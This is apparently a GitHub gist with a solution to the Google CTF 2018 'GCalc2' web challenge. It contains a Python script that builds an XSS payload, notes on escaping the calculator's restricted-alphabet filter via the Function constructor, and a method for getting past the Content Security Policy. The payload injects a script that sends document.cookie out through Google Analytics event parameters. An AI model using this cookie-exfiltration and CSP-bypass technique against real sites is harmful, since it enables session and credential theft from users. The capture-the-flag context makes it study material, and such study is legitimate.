Skip to content

Instantly share code, notes, and snippets.

Last active Jun 27, 2018
What would you like to do?
Google CTF 2018 Quals: GCalc2 web task solution
from urllib import quote_plus
ga_tid = 'UA-***-1' # put your GA id here
url = ''
url += r'?,%22'
url += quote_plus('''
script = document.createElement('script');script.src=''+Math.random()+'&t=event&ec=email&el='+Math.random()+'&cs=newsletter&cm=email&cn='+document.cookie+'&cm1=1&ea=test';document.head.appendChild(script);
'''.replace('"', '\\"').replace('\n','') % ga_tid)
url += r'%22:1%7D'
print url
The application implements client-side "calculator". You can also submit calculation requests to the flag bot.
Requests consist of 1) expression, 2) input vars JSON array.
Essential parts of the solution are as follows:
1) The expressions are executed by the following function:
function p(a, b) {
a = String(a).toLowerCase();
b = String(b);
if (!/^(?:[\(\)\*\/\+%\-0-9 ]|\bvars\b|[.]\w+)*$/.test(a)) throw Error(a);
b = JSON.parse(b, function(a, b) {
if (b && "object" === typeof b && !Array.isArray(b)) return Object.assign(Object.create(null), b);
if ("number" === typeof b) return b
return (new Function("vars", "return " + a))(b)
You should use a limited alphabet to execute a JS payload.
The payload from my exploit can be broken down the following way:
> vars={"pi":3,"return 31337":0}
{pi: 3, return 31337: 0}
ƒ Function() { [native code] }
["", index: 0, input: "Number", groups: undefined]
ƒ Object() { [native code] }
(2) ["pi", "return 31337"]
"return 31337"
2) We should also bypass CSP. loads in sandboxed iframe ("allow-scripts allow-modals allow-same-origin").
Sandbox sends the following header:
Content-security-policy: default-src 'self'; frame-ancestors; font-src; style-src 'self' https://* 'unsafe-inline'; script-src 'self' https://* 'unsafe-eval'; child-src; img-src;
Meaning, we can execute inline scripts, but there's no straightforward way to exfiltrate data. Appended meta-tag with a new CSP doesn't help.
But we can actually use Google Analytics to "collect user data" and exfiltrate the cookie which contains the flag:
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment